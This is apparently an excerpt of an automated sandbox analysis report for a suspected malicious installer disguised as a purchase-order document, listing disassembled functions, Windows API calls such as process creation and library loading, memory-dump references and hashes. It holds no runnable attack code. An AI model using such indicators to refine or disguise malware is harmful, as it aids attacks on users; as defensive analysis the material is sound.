                                                              • Opcode Fuzzy Hash: 0b24a768457497bf3eab191a7c20dd9ef2dcf7a171cde3cdfafed4ce3bf00be3
                                                              • Instruction Fuzzy Hash: 6711C231A04100EBCF206FA0CD44AAE7AB0FF14369B34463BF981B62E1D33D49419A6E
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                              • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                              • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                              • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                • Part of subcall function 00405ED3: wsprintfW.USER32 ref: 00405EE0
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                              • String ID:
                                                              • API String ID: 1404258612-0
                                                              • Opcode ID: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                              • Instruction ID: be65c1d2588467b23a66eae505f80d4d78c913a93c6f7397512a76e1284fe209
                                                              • Opcode Fuzzy Hash: d0aace0066db3accf962e5b6be056e4656163b19ba1ee418162f5e9f181ae1bd
                                                              • Instruction Fuzzy Hash: 2E113A71A00109BFDB00DFA5C945DAEBBB9EF48344F20447AF501F62A1D7749E50DB69
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,382A1D66,00000000,00000000,?,382A5C88,382A1D66,00000000,00000000,00000000,?,382A5E85,00000006,FlsSetValue), ref: 382A5D13
                                                              • GetLastError.KERNEL32(?,382A5C88,382A1D66,00000000,00000000,00000000,?,382A5E85,00000006,FlsSetValue,382AE190,FlsSetValue,00000000,00000364,?,382A5BC8), ref: 382A5D1F
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,382A5C88,382A1D66,00000000,00000000,00000000,?,382A5E85,00000006,FlsSetValue,382AE190,FlsSetValue,00000000), ref: 382A5D2D
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$ErrorLast
                                                              • String ID:
                                                              • API String ID: 3177248105-0
                                                              • Opcode ID: 7657513c38017436e80df91ca3451f1960ba63ec457f388e78a32c11ebd8365d
                                                              • Instruction ID: 6c977d4fa5221619e2a9ebfd45da8c57f05dbf973f0753c3e8645907f8d73751
                                                              • Opcode Fuzzy Hash: 7657513c38017436e80df91ca3451f1960ba63ec457f388e78a32c11ebd8365d
                                                              • Instruction Fuzzy Hash: B701FC36611B23AFD3114AF88D8CA473BB9AF057F5B500624F905E7140DF38D442C6D0
                                                              APIs
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040526C
                                                                • Part of subcall function 00405234: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040527C
                                                                • Part of subcall function 00405234: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040528F
                                                                • Part of subcall function 00405234: SetWindowTextW.USER32(004216C8,004216C8), ref: 004052A1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004052C7
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004052E1
                                                                • Part of subcall function 00405234: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052EF
                                                                • Part of subcall function 00405703: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                                • Part of subcall function 00405703: CloseHandle.KERNEL32(?), ref: 00405739
                                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 3585118688-0
                                                              • Opcode ID: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                              • Instruction ID: a183927f8f084cdb8571cb7bd96d2202481db38f7d29b0955d5094ceef348c04
                                                              • Opcode Fuzzy Hash: cbdbd45a228a051035c7fb8c87293943a325636ebea5dbdff42e394fbb309f67
                                                              • Instruction Fuzzy Hash: EB116171900104EBCF109FA0CD459DF7AB5EB44359F20447BE501B61E1C3794A92DFAA
                                                              APIs
                                                              • _free.LIBCMT ref: 382A655C
                                                                • Part of subcall function 382A62BC: IsProcessorFeaturePresent.KERNEL32(00000017,382A62AB,00000000,?,?,?,?,00000016,?,?,382A62B8,00000000,00000000,00000000,00000000,00000000), ref: 382A62BE
                                                                • Part of subcall function 382A62BC: GetCurrentProcess.KERNEL32(C0000417), ref: 382A62E0
                                                                • Part of subcall function 382A62BC: TerminateProcess.KERNEL32(00000000), ref: 382A62E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                              • String ID: *?$.
                                                              • API String ID: 2667617558-3972193922
                                                              • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction ID: f5f7a928ca099924b02fce997b8d2192d49da25492c93d1b8dc670b10a4db227
                                                              • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                              • Instruction Fuzzy Hash: 69516679E0021AEFDB14CFA8C880AADBBF5FF48754F148169D954E7344DB79DA018B50
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strlen
                                                              • String ID: : $Se.
                                                              • API String ID: 4218353326-4089948878
                                                              • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction ID: 3c93c87dd2ae5fd7e24b7229d1beb7c71fd832b587866c8553f3dde3d4be02a1
                                                              • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                              • Instruction Fuzzy Hash: 0711C179900249BEDB10CFA8D840BDEFBFCAF19314F10509AE645E7212EB749B028765
                                                              APIs
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 382A2903
                                                                • Part of subcall function 382A35D2: RaiseException.KERNEL32(?,?,?,382A2925,00000000,00000000,00000000,?,?,?,?,?,382A2925,?,382B21B8), ref: 382A3632
                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 382A2920
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                              • String ID: Unknown exception
                                                              • API String ID: 3476068407-410509341
                                                              • Opcode ID: 85ddd7997951ecd7b79a3f5a7f5335baafd557bb3d6f01d8fb1fbd9a3e11c52d
                                                              • Instruction ID: cec8faec825fae303c4ee5bacc6b0da03e4d14607ffb8ba8222a567f934f6bca
                                                              • Opcode Fuzzy Hash: 85ddd7997951ecd7b79a3f5a7f5335baafd557bb3d6f01d8fb1fbd9a3e11c52d
                                                              • Instruction Fuzzy Hash: 50F0A43C90430E7B8B04A6B8EC4499D776DDF04790B9045B1E924A6490EF3DEA3689D0
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 004051D7
                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 00405228
                                                                • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                              • Instruction ID: 3506bd8619de0691e6240ff1aea28b3f5ea6f30d487ea60658fc819ef8ae1edd
                                                              • Opcode Fuzzy Hash: 095d3e8979228cc473652e7f56876996a988928912ea754460f36dcc48231124
                                                              • Instruction Fuzzy Hash: 02017171540609ABDF205F91ED80AAB3A25EBA4314F50403AFA007A1E1C77A9C929F6D
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405C45
                                                              • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403358,00436000,00436800), ref: 00405C60
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: nsa
                                                              • API String ID: 1716503409-2209301699
                                                              • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                              • Instruction ID: 7ad1723431e3bc490b0335289974808f62bfc0c3cb5a7c029972da154e4cc245
                                                              • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                              • Instruction Fuzzy Hash: B9F09676604308BBEB009F59DC45E9BB7A8EB91710F10803AEA00E7140E2B0AD548B54
                                                              APIs
                                                              • GetOEMCP.KERNEL32(00000000,?,?,382A6C7C,?), ref: 382A6A1E
                                                              • GetACP.KERNEL32(00000000,?,?,382A6C7C,?), ref: 382A6A35
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2853034781.00000000382A1000.00000040.00001000.00020000.00000000.sdmp, Offset: 382A0000, based on PE: true
                                                              • Associated: 00000005.00000002.2853017629.00000000382A0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000005.00000002.2853034781.00000000382B6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_382a0000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: |l*8
                                                              • API String ID: 0-101287626
                                                              • Opcode ID: 726a1bed2f8ead3094db2a9ec127c509b576237699e3cb74a9f8c1fd0f2192bc
                                                              • Instruction ID: 98caa6df924009a54497dc6ed1c957f1baa20995edc2a967c84b788fdc281b60
                                                              • Opcode Fuzzy Hash: 726a1bed2f8ead3094db2a9ec127c509b576237699e3cb74a9f8c1fd0f2192bc
                                                              • Instruction Fuzzy Hash: F5F04F34400209CFE701DBA4C44CB6E7BB0BF40339F144348E4399A1D2DFBA9986CB41
                                                              APIs
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 0040572C
                                                              • CloseHandle.KERNEL32(?), ref: 00405739
                                                              Strings
                                                              • Error launching installer, xrefs: 00405716
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                              • Instruction ID: 68da1b5efeb229702bef63955ccdeefd44cba6198d5a5f20aa9a51b41b675f94
                                                              • Opcode Fuzzy Hash: 89d61fbbff7ca59509715ff9813e48ed7354dff71edc3a11a34e7e31b27a8334
                                                              • Instruction Fuzzy Hash: 59E0BFB4A0420ABFFB109F64EC49F7B766CE710704F808521BD15F2250D7B4AC108A79
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                              • Instruction ID: 341b99abf03f2e1941eb6220a2ba2fa20bbc036e9949a5bf9c2c078605d2769f
                                                              • Opcode Fuzzy Hash: fbba942c1d572bf921735f4c6026e3062a5fb5b34c07d0b910559572d6fe18fe
                                                              • Instruction Fuzzy Hash: 9DA13471E00229DBDB28CFA8C8547ADBBB1FF48305F11816AD856BB281C7785A96CF44
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                              • Instruction ID: b24004e2459b3715c883c1996b24246953ff0fb47fcdf85fedfa1614f6e92f62
                                                              • Opcode Fuzzy Hash: 9b416045f54723c0aced5ed7493083a206bc2f8aaa63c3fa24b1832e5229f487
                                                              • Instruction Fuzzy Hash: 60911270E00228DBDF28CF98C854BADBBB1FF44305F15816AD856BB291C7789996CF44
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                              • Instruction ID: 0c07c17b414ad8f17a3ff3e8587382d040bd297e960d91c66a6d9af6720fecf2
                                                              • Opcode Fuzzy Hash: d1d8e67d3672fe33e56554ed692c604aaa9ef945de69a5b70ae3e54f11edcfbe
                                                              • Instruction Fuzzy Hash: 38815571D00228DFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7389A96CF54
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                              • Instruction ID: 40c7cf361161e00566e5adfab28d3a5c75941d24eb7bbcfefb24c15ac497d971
                                                              • Opcode Fuzzy Hash: 16c3da451b00ed7501bdbc73778925f50314777a9f5d312f132e9d4e74f014bb
                                                              • Instruction Fuzzy Hash: 91815571D04228DBDF28CFA8C844BADBBB1FB44345F21816AD856BB2C1C7785A96CF45
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                              • Instruction ID: 456f5d8fd794945b55b5d9b3679d3b1ecbaa17202882ac546044f61b7aaf63b3
                                                              • Opcode Fuzzy Hash: 0cc07006cc7c9aef3fafa63e8afbe90e4e7d7e8d46648082bd87270dbbc6feb7
                                                              • Instruction Fuzzy Hash: 10711471D04228DFDF28CF98C844BADBBB1FB48305F15806AD856BB281D7389996DF54
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                              • Instruction ID: 8bd2b1db5987d4e4b96b583130c6a33f56c1bdc1121660429b57e4b15e5e4dee
                                                              • Opcode Fuzzy Hash: eec15c9fa71d2bb8ac0e9ab2641b80d47be28fb4f34c6eac6740816efd5aae2a
                                                              • Instruction Fuzzy Hash: DD713471D04228DFDF28CF98C844BADBBB1FB48305F25806AD856BB291C7389996DF54
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                              • Instruction ID: b46b7f647ddddaa837b295bcbfdf8fe32b4b15f5abab45eff4fbfa9538c7bc71
                                                              • Opcode Fuzzy Hash: 9b7cba6587137bac62e94bd95232145a4a4e4cea60c39cf1103777a64c0d5ae0
                                                              • Instruction Fuzzy Hash: E7712371D04228DFEF28CF98C844BADBBB1FB44305F25806AD856BB291C7789A56DF44
                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B6D
                                                              • lstrcmpiA.KERNEL32(00405D97,00000000), ref: 00405B85
                                                              • CharNextA.USER32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B96
                                                              • lstrlenA.KERNEL32(00405D97,?,00000000,00405D97,00000000,[Rename],00000000,00000000,00000000), ref: 00405B9F
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2825836258.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000005.00000002.2825819015.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825879383.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825903442.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000005.00000002.2825931761.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_5_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                              • Instruction ID: 495cf0b23cfe7cb5471ae9193bfc392c37a901cc734ec181b4002dd8df2403ac
                                                              • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                              • Instruction Fuzzy Hash: 56F0CD32604458AFC7129FA8CD00D9EBBB8EF06250B2140AAF801F7221D634FE019BA9

                                                              Execution Graph

                                                              Execution Coverage:6.3%
                                                              Dynamic/Decrypted Code Coverage:9.2%
                                                              Signature Coverage:3.2%
                                                              Total number of Nodes:2000
                                                              Total number of Limit Nodes:73
